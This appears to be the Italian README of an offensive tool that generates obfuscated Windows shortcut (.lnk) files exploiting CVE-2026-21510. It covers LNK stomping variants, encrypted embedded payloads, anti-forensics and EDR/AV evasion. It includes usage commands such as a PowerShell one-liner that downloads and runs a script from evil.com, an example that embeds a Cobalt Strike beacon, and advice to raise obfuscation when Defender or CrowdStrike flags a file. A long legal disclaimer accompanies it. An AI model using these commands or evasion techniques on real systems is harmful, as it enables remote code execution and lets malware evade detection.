
Genera file .lnk offuscati che sfruttano CVE-2026-21510 con LNK stomping, payload crittografati e anti-forense per test di penetrazione autorizzati e operazioni di red team.
README EpSiLoNPoInTlnk CVE-2026-21510 - Generatore di .LNK Strumento per la generazione di file .lnk che sfruttano la vulnerabilità CVE-2026-21510 (Windows ShellLink Remote Code Execution). Progettato per la ricerca offensiva in sicurezza, test di penetrazione autorizzati e analisi delle vulnerabilità.
Avviso Legale ⚠️ QUESTO STRUMENTO È DESTINATO ESCLUSIVAMENTE A UN USO LEGALE E AUTORIZZATO. Qualsiasi utilizzo non autorizzato contro sistemi o reti violerebbe le leggi locali e internazionali (es: Computer Fraud and Abuse Act (CFAA), GDPR, Legge Godfrain in Francia). L'autore declina ogni responsabilità in caso di uso improprio. (Vedi la Clausola di Non Responsabilità di seguito.)
Descrizione Questo generatore crea file .lnk offuscati per sfruttare CVE-2026-21510, una vulnerabilità nell'elaborazione dei collegamenti di Windows. Integra:
LNK Stomping (5 varianti: dot, path_segment, relative, double_extension, unicode)
PropertyStore con CLSID casuali e PKEY
KnownFolderDataBlock (KnownFolderID casuali o mirati)
EnvironmentVariableDataBlock (offuscamento Unicode, variabili dinamiche)
Offuscamento (Livelli 1-5: TrackerDataBlock, ConsoleDataBlock, blocchi casuali)
Payload incorporati e cifrati (AES-256-CBC + XOR)
Anti-Forensics (timestamp a 0, dimensione file a 0, metadati minimi)
Bypass EDR/AV (processi legittimi, argomenti offuscati in PowerShell)
Generazione di varianti casuali (10+ varianti uniche per evitare le firme)
Prerequisiti Sistema OS: Windows (per testare i .lnk generati) o Linux/macOS (per la generazione).
Python: ≥ 3.10. Dipendenze: pip install pycryptodome
Strumenti Consigliati Analisi: PEStudio, Detect It Easy (DIE)
Debug: x64dbg, WinDbg
Test: Macchina virtuale Windows (es: Windows 10/11 su VirtualBox) isolata.
Installazione Clonare il repository: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk Installare le dipendenze: pip install -r requirements.txt (Facoltativo) Creare un ambiente virtuale: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows
Utilizzo
Generazione Base python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk Genera un .lnk che sfrutta CVE-2026-21510 per avviare calc.exe.
Opzioni Avanzate Opzione Descrizione Valore predefinito --target Percorso di destinazione (es: C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args Argomenti per la destinazione (es: /c whoami) /c calc.exe --output Percorso di output del .lnk ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir Directory di lavoro C:\Windows\System32 --description Descrizione del collegamento Stringa casuale --unc Usa un percorso UNC (?\C:...) False --lnk-stomping Abilita il LNK Stomping True --stomping-variant Variante di LNK Stomping (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation Aggiunge blocchi ExtraData inutili True --obfuscation-level Livello di offuscamento (1-5) 5 --embed-payload Percorso di un file da incorporare (es: payload.bin) None --encrypt-payload Cifra il payload (AES-256-CBC + XOR) True --anti-forensics Applica tecniche anti-forensics True --randomize-clsid Randomizza il CLSID nel PropertyStore True --randomize-known-folder Randomizza il KnownFolderID True --obfuscate-arguments Offusca gli argomenti (PowerShell) True --generate-variants Genera N varianti casuali 0 --debug Modalità debug avanzata (log dettagliati) False
Esempi
Esempio 1: Exploit con Payload Incorporato
python lnkstomperpoint.py
--target "C:\Windows\System32\cmd.exe"
--args "/c payload.exe"
--embed-payload ./malware.bin
--output exploit_with_payload.lnk
--obfuscation-level 5
--anti-forensics
Genera un .lnk con un payload cifrato (AES-256 + XOR) e offuscato.
Esempio 2: Generazione di 10 Varianti Casuali
python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants
Crea 10 varianti uniche per evitare le firme EDR/AV.
Esempio 3: Modalità Minimalista (per test)
python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk
Genera un .lnk non offuscato (per analisi o debug).
Funzionamento Tecnico
Intestazione ShellLink (0x4C byte fissi + offset): LinkCLSID: 00021401-0000-0000-C000-000000000046 (obbligatorio). LinkFlags: Configurato per attivare HasRelativePath, HasWorkingDir, IsUnicode, ecc.
StringData: RelativePath: Percorso di destinazione (con LNK Stomping se attivato). WorkingDir: Directory di lavoro (es: C:\Windows\System32). Arguments: Argomenti offuscati (PowerShell, cmd, ecc.).
ExtraData Blocks (ordine critico): PropertyStoreDataBlock: Contiene PKEY_AppUserModel_ID (CLSID casuale). KnownFolderDataBlock: Punta a una cartella di sistema (es: %SystemRoot%). EnvironmentVariableDataBlock: Forza l'espansione delle variabili prima del Mark-of-the-Web (MotW). Blocchi di Offuscamento (in base a obfuscation_level): TrackerDataBlock (Livello 1) ConsoleDataBlock (Livello 2) DarwinDataBlock, ShimDataBlock, ecc. (Livelli 3-5)
Payload Incorporato (se --embed-payload): Cifrato con AES-256-CBC + XOR.
Il payload viene cifrato con AES-256-CBC (chiave casuale da 32 byte, IV da 16 byte).
Viene applicato un livello XOR con i primi 16 byte della chiave AES.
La chiave e l'IV sono memorizzati in un ShimDataBlock per la decifratura successiva.
Test e Validazione
La dimensione minima del file.
La validità di HeaderSize e CLSID.
La presenza dei LinkFlags richiesti.
La struttura dei blocchi ExtraData (PropertyStore, KnownFolder, ecc.).
Esecuzione (in un ambiente isolato): Fare doppio clic sul .lnk e osservare il comportamento. Usare Process Monitor (ProcMon) per analizzare le chiamate di sistema.
Rilevamento EDR/AV: Testare con strumenti come Windows Defender o CrowdStrike. Se il .lnk viene rilevato, aumentare obfuscation_level o disattivare alcune opzioni.
Casi d'Uso Scenario Comando Descrizione Test di Penetrazione --target "C:\Windows\System32\cmd.exe" --args "/c whoami" Verifica se l'exploit funziona su una macchina target. Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 Genera un .lnk con un payload Cobalt Strike offuscato. Ricerca --generate-variants 50 --output-dir ./samples Crea 50 varianti per testare le rilevazioni EDR. Debug --debug --obfuscation False Mostra log dettagliati per analizzare la struttura del .lnk. Contributi I contributi sono benvenuti! Ecco come contribuire:
Fork del progetto.
Crea un branch (git checkout -b feature/nuova-funzionalità).
Commit delle modifiche (git commit -m "Aggiunta della funzionalità X").
Push verso il branch (git push origin feature/nuova-funzionalità).
Apri una Pull Request. Idee per Contributi:
Aggiungere nuove varianti di LNK Stomping.
Implementare altri algoritmi di cifratura (es: ChaCha20).
Migliorare l'offuscamento degli argomenti (es: uso di JScript).
Aggiungere test unitari per validare le strutture .lnk.
Licenza Questo progetto è sotto licenza MIT. Vedi il file LICENSE per maggiori dettagli.
Clausola di Non Responsabilità 🚨 Clausola di Non Responsabilità
📜 CLAUSOLA DI NON RESPONSABILITÀ (DISCLAIMER)
Leggere attentamente prima di qualsiasi utilizzo di questo strumento.
⚠️ AVVISO GIURIDICO ESPLICITO
L'utente di questo strumento (di seguito denominato "l'Utente") riconosce e accetta espressamente i seguenti termini:
Uso Esclusivamente Legale
Questo strumento è destinato esclusivamente a un uso legale e autorizzato, come:
La ricerca in sicurezza informatica in un contesto accademico o professionale.
I test di penetrazione (pentest) su sistemi di cui l'Utente ha l'autorizzazione scritta del proprietario.
L'analisi delle vulnerabilità in ambienti controllati (es: laboratori di sicurezza, CTF, bug bounty autorizzati).
Qualsiasi altro uso è severamente vietato e può costituire un reato penale in molte giurisdizioni, inclusi (ma non limitati a):
Francia: Legge n. 88-19 del 5 gennaio 1988 (Legge Godfrain), articoli 323-1 a 323-7 del Codice Penale (accesso fraudolento, modifica di dati, ecc.).
Unione Europea: Direttiva 2013/40/UE sugli attacchi contro i sistemi informativi.
Stati Uniti: Computer Fraud and Abuse Act (CFAA), 18 U.S. Code § 1030.
Altri paesi: Leggi locali equivalenti (es: Computer Misuse Act nel Regno Unito).
Assenza di Garanzia
L'Autore (EpSiLoNPoInT) non fornisce alcuna garanzia, esplicita o implicita, riguardo a:
L'affidabilità, l'accuratezza o l'utilità di questo strumento.
L'assenza di bug o vulnerabilità nel codice.
La compatibilità con tutti i sistemi o ambienti.
I risultati ottenuti durante l'utilizzo dello strumento.
L'Utente si assume tutti i rischi legati all'utilizzo di questo strumento, inclusi (ma non limitati a):
I danni materiali o software causati al proprio sistema o a sistemi di terze parti.
Le conseguenze legali in caso di violazione delle leggi applicabili.
Le perdite di dati o le interruzioni di servizio.
Limitazione di Responsabilità
In nessun caso l'Autore, i contributori o qualsiasi altra parte coinvolta nella creazione, produzione o distribuzione di questo strumento potrà essere ritenuta responsabile per:
Qualsiasi danno (diretto, indiretto, incidentale, speciale, esemplare o consequenziale), inclusi (ma non limitati a):
Le perdite di profitti.
Le perdite di dati o la corruzione di file.
I danni alla reputazione.
Le azioni legali o le multe sostenute dall'Utente.
Anche se l'Autore è stato informato della possibilità di tali danni.
Rispetto delle Leggi e dei Regolamenti
L'Utente si impegna a conformarsi a tutte le leggi, i regolamenti e gli standard applicabili nella propria giurisdizione, inclusi (ma non limitati a):
Le leggi sulla protezione dei dati (es: GDPR nell'UE).
Le leggi sulla cybersecurity e la frode informatica.
Le politiche di sicurezza del proprio datore di lavoro o della propria organizzazione.
L'Utente indennizzerà e terrà indenne l'Autore da qualsiasi reclamo, danno o spesa (inclusi i costi legali) derivante da una violazione di queste leggi o impegni.
Divieto di Ridistribuzione Dannosa
All'Utente è formalmente vietato:
Vendere, noleggiare o ridistribuire questo strumento a fini dannosi.
Modificare il codice per trasformarlo in un'arma informatica criminale (es: ransomware, spyware).
Utilizzare questo strumento per prendere di mira infrastrutture critiche (es: ospedali, governi, banche) senza autorizzazione esplicita.
Condividere questo strumento con terzi senza comunicare loro questa clausola di non responsabilità.
Esclusione di Responsabilità per Terze Parti
Questo strumento può interagire con librerie di terze parti (es: pycryptodome).
L'Autore non controlla e non è responsabile delle azioni o delle vulnerabilità di queste librerie.
L'Utente deve verificare la licenza e la sicurezza di qualsiasi dipendenza utilizzata.
Uso a Proprio Rischio
Utilizzando questo strumento, accetti pienamente e senza riserve i termini di questa clausola.
Se non sei d'accordo con questi termini, non utilizzare questo strumento e cancella immediatamente tutte le copie in tuo possesso.
Giurisdizione e Legge Applicabile
Questa clausola è regolata e interpretata in conformità con le leggi della Repubblica Francese.
Qualsiasi controversia derivante da o relativa a questa clausola o all'utilizzo di questo strumento sarà sottoposta alla competenza esclusiva dei tribunali di Parigi (Francia).
🔐 Raccomandazioni di Sicurezza
Per un uso sicuro e legale di questo strumento: ✅ Isola sempre i test in un ambiente virtuale (es: VirtualBox, VMware). ✅ Ottieni un'autorizzazione scritta prima di testare su sistemi che non ti appartengono. ✅ Disattiva le connessioni di rete delle macchine di test per evitare perdite accidentali. ✅ Usa strumenti di monitoraggio (es: Wireshark, Process Monitor) per analizzare il comportamento. ✅ Segnala le vulnerabilità in modo responsabile (es: tramite programmi di bug bounty). ❌ Non testare mai su sistemi di produzione senza autorizzazione. ❌ Non condividere gli exploit generati con persone non autorizzate. ❌ Non archiviare payload dannosi su sistemi accessibili al pubblico.
📞 Contatto
Per qualsiasi domanda legale o tecnica riguardante questo strumento:
Autore: EpSiLoNPoInT
Email: [email protected]
GitHub: EpSiLoNPoInTOrI
⚠️ Nota: L'Autore non fornirà alcun supporto per usi illegali o non etici di questo strumento.
📅 Data della Clausola
Ultimo aggiornamento: 9 maggio 2026 Versione: 1.0